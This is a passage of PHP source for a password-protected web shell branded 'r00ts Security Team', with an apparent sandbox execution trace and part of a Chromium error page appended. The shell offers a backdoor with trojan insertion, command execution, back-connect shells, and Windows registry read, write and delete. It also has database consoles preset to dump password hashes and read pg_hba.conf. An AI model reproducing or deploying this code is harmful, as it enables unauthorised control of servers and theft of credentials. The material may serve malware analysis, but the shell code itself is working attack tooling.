            echo "</font>";
            oci_free_statement($oraresult);
            ocilogoff();
        }
    } elseif ($db == "ifx") {
        $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
        $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
        $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
        $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
        $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
        $ifxquery = stripslashes($ifxquery);
        print <<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select tabname from systables;";
        Str[4] = "select colname from syscolumns where tabid=n;";
        Str[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">dbservername</option>
        <option value="1">databases</option>
        <option value="2">tables</option>
        <option value="3">columns</option>
        <option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($ifxaction == 'ifxquery') {
            $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
            $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
            $ifxrow = ifx_fetch_row($ifxresult);
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mysql_data_seek($ifxresult, 0);
            while ($ifxrow = ifx_fetch_row($ifxresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$ifxrow[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ifx_free_result($ifxresult);
            ifx_close();
        }
    } elseif ($db == "db2") {
        $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
        $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
        $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
        $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
        $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
        $db2action = isset($_POST['action']) ? $_POST['action'] : '';
        $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
        $db2query = stripslashes($db2query);
        print <<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
\tStr = new Array(4);
        Str[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
        Str[2] = "select name from sysibm.systables;";
        Str[3] = "select colname from syscat.columns where tabname='table_name';";
        Str[4] = "db2 get db cfg for db_name;";
\tdb2form.db2sql.value = Str[i];
\treturn true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">databases</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($myaction == 'db2query') {
            //$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
            $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
            $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
            $db2row = db2_fetch_row($db2result);
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            while ($db2row = db2_fetch_row($db2result)) {
                echo "<tr>\n";
                for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$db2row[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            db2_free_result($db2result);
            db2_close();
        }
    } elseif ($db == "fb") {
        $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
        $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
        $fbpath = str_replace("\\\\", "\\", $fbpath);
        $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
        $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
        $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
        $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
        $fbquery = stripslashes($fbquery);
        print <<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
\tStr = new Array(5);
        Str[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
        Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
        Str[3] = "input 'D:\\createtable.sql';";
        Str[4] = "shell netstat -an;";
\tfbform.fbsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">import sql</option>
        <option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($fbaction == 'fbquery') {
            $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
            $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ibase_field_info($fbresult, 0);
            while ($fbrow = ibase_fetch_row($fbresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$fbrow[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ibase_free_result($fbresult);
            ibase_close();
        }
    } else {
        $pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
        $pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres';
        $pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
        $pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
        $pgaction = isset($_POST['action']) ? $_POST['action'] : '';
        $pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
        $pgquery = stripslashes($pgquery);
        print <<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
\tStr = new Array(7);
\tStr[0] = "";
        Str[1] = "select version();";
        Str[2] = "select datname from pg_database;";
        Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
        Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
        Str[5] = "select usename,passwd from pg_shadow;";
\tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
\tpgform.pgsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($pgaction == 'pgquery') {
            $pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error());
            $pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error());
            $pgrow = pg_fetch_row($pgresult);
            echo "<font face=\"verdana\">";
            echo "<table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">";
            echo "\n<tr>\n";
            for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            pg_result_seek($pgresult, 0);
            while ($pgrow = pg_fetch_row($pgresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                    echo "<td bgcolor=\"#B8B8E8\">";
                    echo "{$pgrow[$i]}";
                    echo "</td>";
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            pg_free_result($pgresult);
            pg_close();
        }
    }
}
//control Registry with php
function phpreg()
{
    $shell1 = new COM("wscript.shell") or die("require windows host");
    $action = isset($_POST['action']) ? $_POST['action'] : '';
    echo "<br>";
    echo "<div class=\"actall\"><h5>Read & Write &Del reg</h5><br></div>";
    echo "<br>";
    print <<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   
Rpath:&nbsp<input type="hidden" name="action" value="read">   
<input type="text" name="rpath" value="{$rpath}" size="70">   
<input class="bt" type="submit" value="Read"></form></TD></TR><br><br></div>   
END;
    $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
    $rpath = str_replace("\\\\", "\\", $rpath);
    if ($action == "read") {
        $out = $shell1->RegRead($rpath);
        echo '<pre>' . var_dump($out) . '</pre>';
        echo "<br><br>";
    }
    print <<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>Wpath:      
<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> 
Wtype:&nbsp<input type="text" name="wtype" value="{$wtype}" size="20">
Wvalue:&nbsp<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="write">  
<input class="bt" type="submit" value="write"></form></TD></TR><br><br><br></div>   
END;
    $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
    $wpath = str_replace("\\\\", "\\", $wpath);
    $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
    $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
    if ($action == "write") {
        $shell1->RegWrite($wpath, $wvalue, $wtype);
    }
    print <<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  
Dpath:<input type="hidden" name="action" value="del">   
<input type="text" name="dpath" value="{$dpath}" size="70">   
<input class="bt" type="submit" value="Del"></form></TD></TR><br><br></div>   
END;
    $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
    $dpath = str_replace("\\\\", "\\", $dpath);
    if ($action == "del") {
        $out = $shell1->RegDelete($dpath);
    }
}
function Root_Login($MSG_TOP)
{
    global $lanip;
    print <<<END

<html>
\t<body style="background:#FFFFF;">
\t\t<center>
\t\t<form method="POST">
\t\t<div style="width:551px;height:201px;margin-top:100px;background:threedface;border-color: #000000 #999999 #FFFFF;border-style:solid;border-width:1px;">
\t\t<div style="width:550px;height:22px;padding-top:2px;color:#FFFFFF;background:#000000;clear:both;"><b>{$MSG_TOP}</b></div>
\t\t<div style="width:550px;height:80px;padding-top:30px;color:;clear:both;">PASS:<input type="password" name="b4che10rpass" style="width:200px;height:20px"></div>
\t\t<div style="width:550px;height:50px;clear:both;"><input class="bt" type="submit" value="login"></div>
                <h5>@Copyright spider Clean Backdoor and plus & modify by r00ts Security Team<h5>
                <h5>Your IP : {$lanip} <h5>
\t\t</div>
\t\t</form>
\t\t</center>
\t</body>
</html>
END;
    return false;
}
function WinMain()
{
    $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
    $Server_OS = PHP_OS;
    $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
    print <<<END
<html>
\t<title> r00ts Security Team New PHP Shell 2012-2013 </title>
\t<head>
\t\t<style type="text/css">
\t\t\t*{padding:0; margin:0;}
\t\t\tbody{background:#FFFFF;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin:0 auto; text-align:center;margin-top:5px;word-break:break-all;}
\t\t\t.outtable {height:600px;width:%90;color:#000000;border-top-width: 2px;border-right-width: 2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
\t\t\t.topbg {padding-top:3px;text-align: left;font-size:12px;font-weight: bold;height:22px;width:950px;color:#FFFFFF;background: #293F5F;}
\t\t\t.bottombg {padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
\t\t\t.listbg {font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
\t\t\t.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
\t\t\t.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
\t\t</style>
\t\t<script language="JavaScript">
\t\t\tfunction switchTab(tabid)
\t\t\t{
\t\t\t\tif(tabid == '') return false;
\t\t\t\tfor(var i=0;i<=17;i++)
\t\t\t\t{
\t\t\t\t\tif(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
\t\t\t\t\telse document.getElementById('t_'+i).style.background="#BBBBBB";
\t\t\t\t}
\t\t\t\treturn true;
\t\t\t}
\t\t</script>
\t</head>
\t<body>
\t\t<div class="outtable">
\t\t<div class="topbg"> &nbsp; {$Server_IP} - {$Server_OS} </div>
\t\t\t<div style="height:546px;">
\t\t\t\t<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
\t\t\t\t<tr>
\t\t\t\t<td width="140" align="center" valign="top">
\t\t\t\t\t<ul class="listbg">
\t\t\t\t\t\t<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main"> File Manager </a></li>
\t\t\t\t\t\t<li><a href="?s=b" id="t_1" onclick="switchTab('t_1')" target="main"> Insert Trojan </a></li>
\t\t\t\t\t\t<li><a href="?s=c" id="t_2" onclick="switchTab('t_2')" target="main"> Clean Trojan </a></li>
\t\t\t\t\t\t<li><a href="?s=d" id="t_3" onclick="switchTab('t_3')" target="main"> Bulk Replace </a></li>
\t\t\t\t\t\t<li><a href="?s=e" id="t_4" onclick="switchTab('t_4')" target="main"> Search Trojan </a></li>
                                                <li><a href="?s=u" id="t_21" onclick="switchTab('t_21')" target="main"> Search File</a></li>
                                                <li><a href="?s=v" id="t_22" onclick="switchTab('t_22')" target="main"> FTP Connector</a></li>
\t\t\t\t\t\t<li><a href="?s=f" id="t_5" onclick="switchTab('t_5')" target="main"> Server Info </a></li>
\t\t\t\t\t\t<li><a href="?s=g" id="t_6" onclick="switchTab('t_6')" target="main"> CmdShell </a></li>
\t\t\t\t\t\t<li><a href="?s=h" id="t_7" onclick="switchTab('t_7')" target="main"> Win API </a></li>
\t\t\t\t\t\t<li><a href="?s=i" id="t_8" onclick="switchTab('t_8')" target="main"> Scan Port </a></li>
\t\t\t\t\t\t<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main"> Convert Shellcode </a></li>
\t\t\t\t\t\t<li><a href="?s=k" id="t_10" onclick="switchTab('t_10')" target="main"> Weak Scan </a></li>
\t\t\t\t\t\t<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">Linux Back Connect </a></li>
                                                <li><a href="?s=r" id="t_12" onclick="switchTab('t_12')" target="main">PHP Back Connect </a></li>
\t\t\t\t\t\t<li><a href="?s=m" id="t_13" onclick="switchTab('t_13')" target="main"> Mysql UDF </a></li>
\t\t\t\t\t\t<li><a href="?s=n" id="t_14" onclick="switchTab('t_14')" target="main"> Mysql statement </a></li>
                                                <li><a href="?s=o" id="t_15" onclick="switchTab('t_15')" target="main">Win Reg Shell </a></li>
                                                <li><a href="?s=z" id="t_16" onclick="switchTab('t_16')" target="main">Serv-U </a></li>
                                                <li><a href="?s=x" id="t_17" onclick="switchTab('t_17')" target="main"> Eval PHP Code </a></li>
                                                <li><a href="?s=w" id="t_18" onclick="switchTab('t_18')" target="main"> Other DB Connect </a></li>
\t\t\t\t\t\t<li><a href="?s=logout" id="t_20" onclick="switchTab('t_20')"> Logout </a></li>
\t\t\t\t\t</ul>
\t\t\t\t</td>
\t\t\t\t<td>
\t\t\t\t<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe>
\t\t\t\t</td>
\t\t\t\t</tr>
\t\t\t\t</table>
\t\t\t</div>
\t\t<div class="bottombg"> {$Server_Soft} </div>
\t\t</div>
\t</body>
</html>
END;
    return false;
}
if (get_magic_quotes_gpc()) {
    $_GET = Root_GP($_GET);
    $_POST = Root_GP($_POST);
}
if ($_GET['s'] == 'logout') {
    setcookie('admin_b4che10rpass', NULL);
    die('<meta http-equiv="refresh" content="0;URL=?">');
}
if ($_COOKIE['admin_b4che10rpass'] != md5($password)) {
    ob_start();
    $MSG_TOP = 'LOGIN';
    if (isset($_POST['b4che10rpass'])) {
        $cookietime = time() + 86400;
        setcookie('admin_b4che10rpass', md5($_POST['b4che10rpass']), $cookietime);
        if (md5($_POST['b4che10rpass']) == md5($password)) {
            die('<meta http-equiv="refresh" content="1;URL=?">');
        } else {
            $MSG_TOP = 'This is my privileges, What are you doing man ?';
        }
    }
    Root_Login($MSG_TOP);
    exit;
}
if (isset($_GET['s'])) {
    $s = $_GET['s'];
    if ($s != 'a' && $s != 'n') {
        Root_CSS();
    }
} else {
    $s = 'MyNameIsHacker';
}
$p = isset($_GET['p']) ? $_GET['p'] : File_Str("/var/www/html");
switch ($s) {
    case "a":
        File_a($p);
        break;
    case "b":
        Guama_b();
        break;
    case "c":
        Qingma_c();
        break;
    case "d":
        Tihuan_d();
        break;
    case "e":
        Antivirus_e();
        break;
    case "f":
        Info_f();
        break;
    case "g":
        Exec_g();
        break;
    case "h":
        Com_h();
        break;
    case "i":
        Port_i();
        break;
    case "j":
        Shellcode_j();
        break;
    case "k":
        Crack_k();
        break;
    case "l":
        Linux_l();
        break;
    case "m":
        Mysql_m();
        break;
    case "n":
        Mysql_n();
        break;
    case "o":
        phpreg();
        break;
    case "p":
        File_Edit($_GET['fp'], $_GET['fn']);
        break;
    case 'x':
        phpcode();
        break;
    case 'r':
        phpsocket();
        break;
    case 'w':
        otherdb();
        break;
    case 'z':
        su();
        break;
    case 'u':
        Findfile_j();
        break;
    case 'v':
        ftp_php();
        break;
    default:
        WinMain();
        break;
}
Execution traces
data/traces/78b8a6ad5c0e1bc162638574bcbb49f2_trace-1676245655.5705.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:48:01.468330]
1	0	1	0.000157	393512
			0.001089	314224
TRACE END   [2023-02-12 21:48:01.469293]

Generated HTML code
<html dir="ltr" lang="en"><head>
  <meta charset="utf-8">
  <meta name="color-scheme" content="light dark">
  <meta name="theme-color" content="#fff">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,
                                 maximum-scale=1.0, user-scalable=no">
  <title>localhost</title>
  <style>/* Copyright 2017 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

a {
  color: var(--link-color);
}

body {
  --background-color: #fff;
  --error-code-color: var(--google-gray-700);
  --google-blue-100: rgb(210, 227, 252);
  --google-blue-300: rgb(138, 180, 248);
  --google-blue-600: rgb(26, 115, 232);
  --google-blue-700: rgb(25, 103, 210);
  --google-gray-100: rgb(241, 243, 244);
  --google-gray-300: rgb(218, 220, 224);
  --google-gray-500: rgb(154, 160, 166);
  --google-gray-50: rgb(248, 249, 250);
  --google-gray-600: rgb(128, 134, 139);
  --google-gray-700: rgb(95, 99, 104);
  --google-gray-800: rgb(60, 64, 67);
  --google-gray-900: rgb(32, 33, 36);
  --heading-color: var(--google-gray-900);
  --link-color: rgb(88, 88, 88);
  --popup-container-background-color: rgba(0,0,0,.65);
  --primary-button-fill-color-active: var(--google-blue-700);
  --primary-button-fill-color: var(--google-blue-600);
  --primary-button-text-color: #fff;
  --quiet-background-color: rgb(247, 247, 247);
  --secondary-button-border-color: var(--google-gray-500);
  --secondary-button-fill-color: #fff;
  --secondary-button-hover-border-color: var(--google-gray-600);
  --secondary-button-hover-fill-color: var(--google-gray-50);
  --secondary-button-text-color: var(--google-gray-700);
  --small-link-color: var(--google-gray-700);
  --text-color: var(--google-gray-700);
  background: var(--background-color);
  color: var(--text-color);
  word-wrap: break-word;
}

.nav-wrapper .secondary-button {
  background: var(--secondary-button-fill-color);
  border: 1px solid var(--secondary-button-border-color);
  color: var(--secondary-button-text-color);
  float: none;
  margin: 0;
  padding: 8px 16px;
}

.hidden {
  display: none;
}

html {
  -webkit-text-size-adjust: 100%;
  font-size: 125%;
}

.icon {
  background-repeat: no-repeat;
  background-size: 100%;
}

@media (prefers-color-scheme: dark) {
  body {
    --background-color: var(--google-gray-900);
    --error-code-color: var(--google-gray-500);
    --heading-color: var(--google-gray-500);
    --link-color: var(--google-blue-300);
    --primary-button-fill-color-active: rgb(129, 162, 208);
    --primary-button-fill-color: var(--google-blue-300);
    --primary-button-text-color: var(--google-gray-900);
    --quiet-background-color: var(--background-color);
    --secondary-button-border-color: var(--google-gray-700);
    --secondary-button-fill-color: var(--google-gray-900);
    --secondary-button-hover-fill-color: rgb(48, 51, 57);
    --secondary-button-text-color: var(--google-blue-300);
    --small-link-color: var(--google-blue-300);
    --text-color: var(--google-gray-500);
  }
}
</style>
  <style>/* Copyright 2014 The Chromium Authors
   Use of this source code is governed by a BSD-style license that can be
   found in the LICENSE file. */

button {
  border: 0;
  border-radius: 4px;
  box-sizing: border-box;
  color: var(--primary-button-text-color);
  cursor: pointer;
  float: right;
  font-size: .875em;
  margin: 0;
  padding: 8px 16px;
  transition: box-shadow 150ms cubic-bezier(0.4, 0, 0.2, 1);
  user-select: none;
}

[dir='rtl'] button {
  float: left;
}

.bad-clock button,
.captive-portal button,
.https-only button,
.insecure-form button,
.lookalike-url button,
.main-frame-blocked button,
.neterror button,
.pdf button,
.ssl button,
.enterprise-block button,
.enterprise-warn button,
.safe-browsing-billing button {
  background: var(--primary-button-fill-color);
}

button:active {
  background: var(--primary-button-fill-color-active);
  outline: 0;
}

#debugging {
  display: inline;
  overflow: auto;
}

.debugging-content {
  line-height: 1em;
  margin-bottom: 0;
  margin-top: 1em;
}

.debugging-content-fixed-width {
  display: block;
  font-family: monospace;
  font-size: 1.2em;
  margin-top: 0.5em;
}

.debugging-title {
  font-weight: bold;
}

#details {
  margin: 0 0 50px;
}

#details p:not(:first-of-type) {
  margin-top: 20px;
}

.secondary-button:active {
  border-color: white;
  box-shadow: 0 1px 2px 0 rgba(60, 64, 67, .3),
      0 2px 6px 2px rgba(60, 64, 67, .15);
}

.secondary-button:hover {
  background: var(--secondary-button-hover-fill-color);
  border-color: var(--secondary-button-hover-border-color);
  text-decoration: none;
}

.error-code {
  color: var(--error-code-color);
  font-size: .8em;
  margin-top: 12px;
  text-transform: uppercase;
}

#error-debugging-info {
  font-size: 0.8em;
}

h1 {
  color: var(--heading-color);
  font-size: 1.6em;
  font-weight: normal;
  line-height: 1.25em;
  margin-bottom: 16px;
}

h2 {
  font-size: 1.2em;
  font-weight: normal;
}

.icon {
  height: 72px;
  margin: 0 0 40px;
  width: 72px;
}

input[type=checkbox] {
  opacity: 0;
}

input[type=checkbox]:focus ~ .checkbox::after {
  outline: -webkit-focus-ring-color auto 5px;
}

.interstitial-wrapper {
  box-sizing: border-box;
  font-size: 1em;
  line-height: 1.6em;
  margin: 14vh auto 0;
  max-width: 600px;
  width: 100%;
}

#main-message > p {
  display: inline;
}

#extended-reporting-opt-in {
  font-size: .875em;
  margin-top: 32px;
}

#extended-reporting-opt-in label {
  display: grid;
  grid-template-columns: 1.8em 1fr;
  position: relative;
}

#enhanced-protection-message {
  border-radius: 4px;
  font-size: 1em;
  margin-top: 32px;
  padding: 10px 5px;
}

#enhanced-protection-message label {
  display: grid;
  grid-template-columns: 2.5em 1fr;
  position: relative;
}

#enhanced-protection-message div {
  margin: 0.5em;
}

#enhanced-protection-message .icon {
  height: 1.5em;
  vertical-align: middle;
  width: 1.5em;
}

.nav-wrapper {
  margin-top: 51px;
}

.nav-wrapper::after {
  clear: both;
  content: '';
  display: table;
  width: 100%;
}

.small-link {
  color: var(--small-link-color);
  font-size: .875em;
}

.checkboxes {
  flex: 0 0 24px;
}

.checkbox {
  --padding: .9em;
  background: transparent;
  display: block;
  height: 1em;
  left: -1em;
  padding-inline-start: var(--padding);
  position: absolute;
  right: 0;
  top: -.5em;
  width: 1em;
}

.checkbox::after {
  border: 1px solid white;
  border-radius: 2px;
  content: '';
  height: 1em;
  left: var(--padding);
  position: absolute;
  top: var(--padding);
  width: 1em;
}

.checkbox::before {
  background: transparent;
  border: 2px solid white;
  border-inline-end-width: 0;
  border-top-width: 0;
  content: '';
  height: .2em;
  left: calc(.3em + var(--padding));
  opacity: 0;
  position: absolute;
  top: calc(.3em  + var(--padding));
  transform: rotate(-45deg);
  width: .5em;
}

input[type=checkbox]:checked ~ .checkbox::before {
  opacity: 1;
}

#recurrent-error-message {
  background: #ededed;
  border-radius: 4px;
  margin-bottom: 16px;
  margin-top: 12px;
  padding: 12px 16px;
}

.showing-recurrent-error-message #extended-reporting-opt-in {
  margin-top: 16px;
}

.showing-recurrent-error-message #enhanced-protection-message {
  margin-top: 16px;
}

@media (max-width: 700px) {
  .interstitial-wrapper {
    padding: 0 10%;
  }

  #error-debugging-info {
    overflow: auto;
  }
}

@media (max-width: 420px) {
  button,
  [dir='rtl'] button,
  .small-link {
    float: none;
    font-size: .825em;
    font-weight: 500;
    margin: 0;
    width: 100%;
  }

  button {
    padding: 16px 24px;
  }

  #details {
    margin: 20px 0 20px 0;
  }

  #details p:not(:first-of-type) {
    margin-top: 10px;
  }

  .secondary-button:not(.hidden) {
    display: block;
    margin-top: 20px;
    text-align: center;
    width: 100%;
  }

  .interstitial-wrapper {
    padding: 0 5%;
  }

  #extended-reporting-opt-in {
    margin-top: 24px;
  }

  #enhanced-protection-message {
    margin-top: 24px;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

/**
 * Mobile specific styling.
 * Navigation buttons are anchored to the bottom of the screen.
 * Details message replaces the top content in its own scrollable area.
 */

@media (max-width: 420px) {
  .nav-wrapper .secondary-button {
    border: 0;
    margin: 16px 0 0;
    margin-inline-end: 0;
    padding-bottom: 16px;
    padding-top: 16px;
  }
}

/* Fixed nav. */
@media (min-width: 240px) and (max-width: 420px) and
       (min-height: 401px),
       (min-width: 421px) and (min-height: 240px) and
       (max-height: 560px) {
  body .nav-wrapper {
    background: var(--background-color);
    bottom: 0;
    box-shadow: 0 -12px 24px var(--background-color);
    left: 0;
    margin: 0 auto;
    max-width: 736px;
    padding-inline-end: 24px;
    padding-inline-start: 24px;
    position: fixed;
    right: 0;
    width: 100%;
    z-index: 2;
  }

  .interstitial-wrapper {
    max-width: 736px;
  }

  #details,
  #main-content {
    padding-bottom: 40px;
  }

  #details {
    padding-top: 5.5vh;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  body {
    margin: 0 auto;
  }

  button,
